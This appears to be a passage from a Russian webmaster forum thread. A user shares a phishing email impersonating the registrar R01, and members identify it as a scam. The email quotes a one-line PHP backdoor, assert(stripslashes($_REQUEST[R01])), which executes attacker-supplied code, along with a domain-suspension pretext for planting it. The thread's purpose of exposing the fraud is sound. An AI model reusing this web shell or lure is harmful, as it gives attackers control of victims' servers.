- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Получил сейчас от support@r01.ru вот такое письмецо:
Вы должны подтвердить, что фактическое управление доменом ****.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1y41t2vk4se771h.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 11 июня 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Вопрос: кто чего думает и скажет конструктивное по этому поводу?
kuprum, к R01 это не имеет отношение. Рассылка мошенников.
Проигнорируйте это письмо.
Спасибо.
Мне интересно, какую цель преследуют?
Мне интересно, какую цель преследуют?
Так через эту бяку могут, как минимум, аналогичные письма рассылать. Как и на хост залить чего угодно.
Мне интересно, какую цель преследуют?
А в мануале почитай о конструкции assert(stripslashes($_REQUEST[R01])). :)
Станет понятно.
Черный ход попросили открыть.😂
Например это:
создаст файл 33.php , который выведет Hi на экран, но в $_REQUEST[R01] вероятно что то другое сунут.
Только хотел создать тоже тему, но мене опердили
Всем спасибо :)
kuprum, шелл разместят, далее на что воображения хватит.
Только хотел создать тоже тему, но мене опердили
Экий ты неповоротливый 🤣
Вот от R01 еще в апреле приходило.
Некоторые администраторы доменных имен получили письма от имени R01 c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом, либо оплатить сбор в связи с изменениями правил.
Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.
Чтобы не стать жертвой мошенничества:
никогда не загружайте вложения, не устанавливайте внешние файлы и не производите оплату, если не уверены в безопасности этих операций;
при малейших подозрениях обращайтесь в службу поддержки.
Будьте бдительны!